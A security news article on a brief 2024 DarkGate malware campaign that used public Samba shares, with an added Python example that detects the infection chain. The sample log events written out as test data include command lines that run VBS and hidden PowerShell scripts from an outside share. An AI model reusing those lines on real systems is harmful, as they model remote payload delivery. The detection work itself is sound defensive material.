Cybersecurity researchers have revealed a brief DarkGate malware campaign that used Samba file shares to initiate infections.

According to Palo Alto Networks Unit 42, the activity took place between March and April 2024. The infection chains used servers that hosted Visual Basic Script (VBS) and JavaScript files on public-facing Samba file shares. Targets were located across North America, Europe, and parts of Asia.
According to security researchers Vishwa Thothathri, Yijie Sui, Anmol Maurya, Uday Pratap Singh, and Brad Duncan, the campaign, although brief in duration, serves as an insightful example of how nefarious agents can resourcefully misuse lawful tools and services for malware dissemination.
DarkGate first appeared in 2018 and has since evolved into a malware-as-a-service (MaaS) offering used by a select few clients under tight control. Its features include remote control of compromised hosts, code execution, cryptocurrency mining, reverse shells, and the installation of additional payloads.

Use of the malware has increased notably in recent months, especially since the QakBot infrastructure was dismantled by multinational law enforcement agencies in August 2023.

The campaign documented by Unit 42 begins with Microsoft Excel (.xlsx) files that prompt targets to click an embedded Open button. Doing so fetches and runs VBS code from a Samba file share.

The VBS code retrieves and executes a PowerShell script, which is set up to fetch and run another PowerShell script that downloads an AutoHotKey-based DarkGate package. Alternative chains that use JavaScript files instead of VBS are no different: both are designed to retrieve and execute the follow-on PowerShell script.

To impede analysis, DarkGate scans for various anti-malware products and inspects CPU details to distinguish physical from virtual environments.
Additionally, it scrutinizes the active processes on a host system to detect any reverse engineering tools, debuggers, or virtualization applications in use.
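The chain described above (Office document, then a script host running VBS/JS straight off a remote Samba share, then PowerShell) is visible in endpoint process-creation telemetry. The following is an added detection example, not code from Unit 42 or from the article; the log records, the `203.0.113.10` share, the `.corp.example` DNS suffix and the notion of "internal" address space are all constructed assumptions.

```python
import ipaddress
import re

# Constructed sample process-creation events (Sysmon-style, simplified).
# They are made up for this example, not records from the Unit 42 report.
SAMPLE_EVENTS = [
    {"parent": "EXCEL.EXE", "image": "wscript.exe",
     "cmdline": r'wscript.exe "\\203.0.113.10\share\invoice.vbs"'},
    {"parent": "wscript.exe", "image": "powershell.exe",
     "cmdline": r'powershell.exe -w hidden -File "\\203.0.113.10\share\stage1.ps1"'},
    {"parent": "explorer.exe", "image": "wscript.exe",
     "cmdline": r"wscript.exe C:\Users\alice\Desktop\cleanup.vbs"},
    {"parent": "cmd.exe", "image": "cscript.exe",
     "cmdline": r'cscript.exe //nologo "\\fileserver.corp.example\tools\inventory.js"'},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# A UNC path whose target is a Windows Script Host file type (VBS/JS and encoded variants).
UNC_SCRIPT = re.compile(r'\\\\(?P<host>[^\\\s"]+)\\[^\s"]+\.(?:vbs|vbe|js|jse)\b', re.I)
# What counts as "internal" is an assumption for this example: RFC 1918 space
# plus the organisation's own DNS suffix (also assumed).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
INTERNAL_SUFFIXES = (".corp.example",)


def is_internal_host(host: str) -> bool:
    """True if the UNC host is an RFC 1918 address or carries an internal DNS suffix."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host.lower().endswith(INTERNAL_SUFFIXES)
    return any(ip in net for net in INTERNAL_NETS)


def classify(event: dict) -> list:
    """Return detection tags for one event; an empty list means nothing suspicious."""
    tags = []
    image, parent = event["image"].lower(), event["parent"].lower()
    if image in SCRIPT_HOSTS:
        m = UNC_SCRIPT.search(event["cmdline"])
        if m:
            tags.append("script-host-unc-path")  # VBS/JS run straight off a share
            if not is_internal_host(m.group("host")):
                tags.append("unc-host-external")  # share is not one the org owns
            if parent in OFFICE_APPS:
                tags.append("office-parent")  # the Excel "Open" button stage
    if image == "powershell.exe" and parent in SCRIPT_HOSTS:
        tags.append("powershell-from-script-host")  # script stage handing off to PowerShell
    return tags
```

The fourth sample shows why the tags are tiered rather than a single yes/no: a script launched from an internal file server by an administrator gets only the weakest tag, while an Office parent or an external share host is what should raise an alert.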
According to the researchers, DarkGate's C2 traffic uses unencrypted HTTP requests, but the data is obfuscated and appears as Base64-encoded text.
DarkGate's evolving infiltration techniques and resistance to analysis serve as a strong reminder of the critical need for robust and proactive cybersecurity defenses.